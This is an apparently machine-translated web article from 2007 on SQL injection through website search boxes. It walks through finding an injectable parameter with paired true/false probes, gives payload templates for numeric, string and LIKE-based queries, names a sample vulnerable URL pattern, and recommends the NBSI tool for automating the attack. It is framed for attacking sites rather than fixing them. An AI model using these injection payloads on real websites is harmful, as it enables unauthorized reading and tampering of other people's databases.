SoFunction
Updated on 2025-04-10

Search type injection I think --- Injection is inseparable

Search type injection I think --- Injection is inseparable

Updated: January 16, 2007 00:00:00 Author:
Today I saw an article about search injection, which uses a new technology and detects Samsung:/

The injection method is:

Generally, searches on websites are partially matched
The vulnerable url is /news/?page=1&type=product&ST=title&SC=
Construct injection statement Samsung %'and 1=1 and '%'='
Samsung %'and 1=2 and '%'='

You see, the two return pages are different, indicating that there are injected vulnerabilities, feature words, writing, notebook is Samsung %'and 1=1 and '%'='



We know that search codes are written in this way:

Select * from Table name where field like '%keyword%'

This results in all matches before and after the keyword (% is used for all matches)

If the keywords are not filtered here, you can construct it like this:

Keyword =' and [Query Condition] and '%25'='

This query becomes

select * from Table name where field like '%' and 1=1 and '%'='%'

This makes a very good SQL injection point. Of course, it can be done by hand, and it can be done by nbsi~~

Injection is inseparable, there is no need for any type of injection! ~

If you don't believe it, please read the original words of "SQL Injected into the Heavenly Book" below

Section 1, General steps of SQL injection

First, judge the environment, find the injection point, and judge the database type, which has been discussed in the introductory chapter.

Secondly, according to the injection parameter type, the original appearance of SQL statements are reconstructed in mind, and the parameter type is mainly divided into the following three types:

(A) ID=49 The parameters injected in this type are numerical, and the original appearance of the SQL statement is roughly as follows:
Select * from Table name where field=49
The injected parameter is ID=49 And [query condition], that is, the generated statement:
Select * from Table name where field=49 And [Query condition]


(B) Class=Serial The parameters injected in this type are character types, and the original appearance of SQL statements is roughly as follows:
Select * from Table name where field='Serials'
The injected parameter is Class=Serial ' and [Query Condition] and ‘'=', that is, the generated statement:
Select * from Table name where field='Serial drama' and [Query condition] and '=''

(C) If there are no filtering parameters during searching, such as keyword= keyword, the original appearance of the SQL statement is roughly as follows:
Select * from Table name where field like '%keyword%'
The injected parameter is keyword=' and [query condition] and ‘%25'=’, which is the generation statement:
Select * from Table name where field like '%' and [Query condition] and '%'='%'


Of course manual work is troublesome

If you use tools, I suggest using nbsi tools is better. I feel that only nbsi combines this technology and cannot be injected with other software.

Injection point just write:

/news/?page=1&type=product&ST=title&SC=%

Just add a feature character